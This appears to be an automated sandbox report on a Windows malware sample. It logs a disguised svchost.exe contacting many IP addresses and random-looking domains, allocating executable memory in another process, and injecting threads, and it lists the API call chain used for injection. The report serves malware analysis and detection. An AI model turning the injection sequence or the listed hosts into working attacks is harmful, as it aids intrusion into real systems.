Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumymap.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: purylal.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyryvex.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: gaqyres.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vocyjic.com
Allocates memory in foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1200000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1320000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 3070000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2A50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 26B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C00000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 780000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2980000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2410000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1030000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 870000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1040000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2530000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 840000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 810000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 850000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1480000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1500000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1150000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1130000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1500000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 850000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1100000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1420000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 710000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1590000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1140000 protect: page execute and read and writeJump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401580
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C93240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02C93240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01433240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_01433240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013A3240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_013A3240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03233240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,10_2_03233240
Creates a thread in another existing process (thread injection)
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 1201360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 1321360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 3071360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 2F61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 2B51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 13A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 2A51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: E71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 1011360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 2AB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 26B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: F11360Jump to behavior
